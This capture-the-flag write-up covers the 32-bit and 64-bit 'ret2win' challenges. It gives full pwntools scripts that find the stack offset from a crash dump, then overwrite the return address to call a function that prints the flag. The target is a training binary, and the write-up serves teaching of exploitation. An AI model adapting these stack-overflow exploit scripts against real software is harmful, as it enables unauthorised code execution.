ret2win

ret2win 32bit

Solution

This is a typical ret2text challenge: the binary contains an unused function, ret2win, in the .text segment that calls system("/bin/cat flag.txt") for us. Such never-called code is sometimes referred to as "dead code".

Exploit

#!/usr/bin/env python3
"""ret2win (32-bit) solve script.

Two runs of the target: the first is crashed with a cyclic pattern to
measure how many bytes separate the input buffer from the saved return
address; the second receives padding plus the address of ret2win.
"""
from pwn import *


def _crash_offset(binary):
    """Return the number of input bytes needed to reach the saved return address.

    Spawns a throwaway instance of *binary*, answers the "> " prompt with a
    1024-byte cyclic pattern, waits for the crash and looks up the value of
    eip from the core dump inside that pattern. The core file is removed
    once it has been parsed.
    """
    victim = binary.process()
    victim.sendlineafter("> ", cyclic(1024))
    victim.wait()
    dump = victim.corefile
    victim.close()
    # The dump object already holds the register state; drop the file itself.
    os.remove(dump.file.name)
    return cyclic_find(dump.eip)


#--------Setup--------#
context(arch="i386", os="linux")
elf = ELF("ret2win32", checksec=False)
#--------Offset--------#
offset = _crash_offset(elf)
log.info(f"{offset = }")
#--------ret2text--------#
# Address taken from the symbol table. This is only a usable fixed address
# when the binary is not position-independent; the script does not check
# that (checksec output is suppressed above).
ret2win = elf.sym["ret2win"]
padding = b"A" * offset
# flat() packs the integer according to the configured context (i386 -> 4-byte
# little-endian) and concatenates it onto the padding.
payload = flat([padding, ret2win])
p = elf.process()
p.sendlineafter("> ", payload)
p.interactive()

ret2win 64bit

Solution

The approach is essentially the same as in the 32-bit case. The one visible difference is how the offset is recovered: the script reads the four pattern bytes sitting at rsp in the core dump rather than the instruction pointer itself.

Exploit

#!/usr/bin/env python3
"""ret2win (64-bit) solve script.

Same structure as the 32-bit version: crash once with a cyclic pattern to
measure the distance to the saved return address, then run again with
padding followed by the address of ret2win.
"""
from pwn import *


def _crash_offset(binary):
    """Return the number of input bytes needed to reach the saved return address.

    Spawns a throwaway instance of *binary*, answers the "> " prompt with a
    1024-byte cyclic pattern and waits for the crash. On amd64 the pattern
    value is read from the stack at rsp instead of from rip — presumably
    because a pattern-derived 64-bit address is not canonical and never
    lands in rip; the four bytes at rsp are then located in the pattern.
    The core file is removed once it has been parsed.
    """
    victim = binary.process()
    victim.sendlineafter("> ", cyclic(1024))
    victim.wait()
    dump = victim.corefile
    victim.close()
    # The dump object already holds the register state; drop the file itself.
    os.remove(dump.file.name)
    return cyclic_find(dump.read(dump.rsp, 4))


#--------Setup--------#
context(arch="amd64", os="linux")
elf = ELF("ret2win", checksec=False)
#-------Offset--------#
offset = _crash_offset(elf)
log.info(f"{offset = }")
#--------ret2text--------#
# Address taken from the symbol table. This is only a usable fixed address
# when the binary is not position-independent; the script does not check
# that (checksec output is suppressed above).
ret2win = elf.sym["ret2win"]
padding = b"A" * offset
# flat() packs the integer according to the configured context (amd64 -> 8-byte
# little-endian) and concatenates it onto the padding.
payload = flat([padding, ret2win])
p = elf.process()
p.sendlineafter("> ", payload)
p.interactive()